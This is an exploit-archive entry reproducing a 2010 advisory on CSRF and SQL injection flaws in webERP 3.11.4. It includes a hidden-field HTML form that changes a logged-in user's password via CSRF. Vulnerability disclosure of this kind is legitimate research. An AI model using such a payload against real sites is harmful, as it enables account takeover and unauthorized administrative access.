webERP 3.11.4 - Multiple Vulnerabilities

ID EXPLOITPACK:DE9B035270D057810E55C74FEE5858A3
Type exploitpack
Reporter ADEO Security
Modified 2010-06-30T00:00:00


webERP 3.11.4 - Multiple Vulnerabilities

                                            # Title: webERP Multiple Vulnerabilities
# Author: ADEO Security
# Published: 30/06/2010
# Version: 3.11.4 (Possible all versions)
# Vendor:

# Description: "webERP is a complete web based accounting/ERP system
that requires only a web-browser and pdf reader to use. It has a wide
range of features suitable for many businesses particularly
distributed businesses in wholesale and distribution. It is developed
as an open-source application and is available as a free download to
use. The feature set is continually expanding as new businesses and
developers adopt it.There are on average 5,000 downloads per month."

# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
- Mail: security[AT]
- Web:

# Vulnerabilities:
1) CSRF: Attacker can add new administrator to the system. All files
have this issue. See #PoC section.
2) SQL Injection: Application offer disable the magic_quotes_gpc.
Attacker can inject sql codes if exploit the CSRF vulnerability. HTTP
Requests must filtered.

# PoC (CSRF):
<form method="POST" action="http://server/UserSettings.php?">
<input type="hidden" name="RealName" VALUE="ADEO-Security">
<input type='hidden' name='DisplayRecordsMax' VALUE="10">
<input type='hidden' name='Language' VALUE='en_US'>
<input type='hidden' name='Theme' VALUE='green'>
<input type='hidden' name='pass' value='adeopass'>
<input type='hidden' name='passcheck' value='adeopass'>
<input type='hidden' name='email' size=40 value=''>
<input type='hidden' name='Modify' value="Modify""></div>